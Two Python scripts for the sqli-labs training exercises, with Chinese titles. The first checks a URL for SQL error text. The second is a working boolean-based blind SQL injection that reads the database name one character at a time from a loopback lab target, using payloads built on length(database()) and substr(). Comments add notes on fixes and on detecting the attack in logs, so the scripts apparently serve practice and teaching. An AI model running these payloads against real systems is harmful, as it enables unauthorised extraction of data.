sqli-labs 第一关验证 PoC
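import re

import requests

# Error-message check for a lab target: fetch the URL typed by the operator and
# look for the word "syntax" in the response body. The URL is requested exactly
# as entered; this script adds nothing to it.
# Run it only against a lab instance you operate yourself.

# Seconds to wait for the server before giving up, so the check cannot hang
# indefinitely on an unresponsive host.
REQUEST_TIMEOUT = 10

url = input("输入你的url:")
r = requests.get(url, timeout=REQUEST_TIMEOUT)

# r.text is the decoded body. str(r.content) is the repr of a bytes object
# (b'...'), in which every non-ASCII byte shows up as an escape sequence.
res = r.text

# Heuristic only. Any page that contains the word "syntax" is reported as
# vulnerable, and an application that hides database errors is reported as
# clean, so neither answer is proof.
# NOTE(review): a genuine hit presumably means the application builds its query
# from raw request input and also returns database errors to the client. The
# fixes are bound parameters and a generic error page.
if re.search("syntax", res):
    print("存在sql注入")
else:
    print("不存在")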
sqli-labs 第八关:查询数据库名
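import string

import requests

# Boolean-based blind lookup of the current database name against the Less-8
# exercise on a loopback address (127.0.0.2), i.e. a lab on the local machine.
#
# How the oracle works: the page for "?id=1" has a known length. A condition is
# appended to the id value; when the response has that same length the
# condition is taken as true. Comparing lengths is fragile: any dynamic content
# in the page (timestamps, tokens) breaks it.
#
# Defender's view: this only works because the id parameter reaches the SQL
# statement without being bound as a parameter. In the access log the run shows
# up as a burst of near-identical requests whose query strings contain
# "length(database())" and "substr(database(),", which is a practical
# detection signature.

# Seconds to wait per request, so one stalled response cannot hang the script.
REQUEST_TIMEOUT = 10
# Largest database-name length that is probed before giving up.
MAX_DB_NAME_LEN = 30

url = "http://127.0.0.2:8087/Less-8/"

# Baseline: length of the page returned for an unmodified, valid id.
normalTextLen = len(requests.get(url + "?id=1", timeout=REQUEST_TIMEOUT).text)

# Step 1: find the name length by testing 0..MAX_DB_NAME_LEN in turn.
# dbNameLen stays None when no candidate matches.
dbNameLen = None
for candidate in range(MAX_DB_NAME_LEN + 1):
    dbNameLen_url = url + "?id=1'+and+length(database())=" + str(candidate) + "--+"
    if len(requests.get(dbNameLen_url, timeout=REQUEST_TIMEOUT).text) == normalTextLen:
        dbNameLen = candidate
        break
else:
    print("Error!")

# Step 2: recover the name one position at a time.
# Skipped when step 1 failed. The original fell through with a length of 30
# and sent 30 * 26 requests that could not produce a meaningful result.
dbName = ""
if dbNameLen is not None:
    for i in range(1, dbNameLen + 1):
        # Only a-z is tried. A position holding any other character is skipped
        # without notice, and the printed name is then incomplete.
        for a in string.ascii_lowercase:
            dbName_url = url + "?id=1'+and+substr(database()," + str(i) + ",1)='" + a + "'--+"
            if len(requests.get(dbName_url, timeout=REQUEST_TIMEOUT).text) == normalTextLen:
                dbName += a
                # Progress output: the name recovered so far.
                print(dbName)
                break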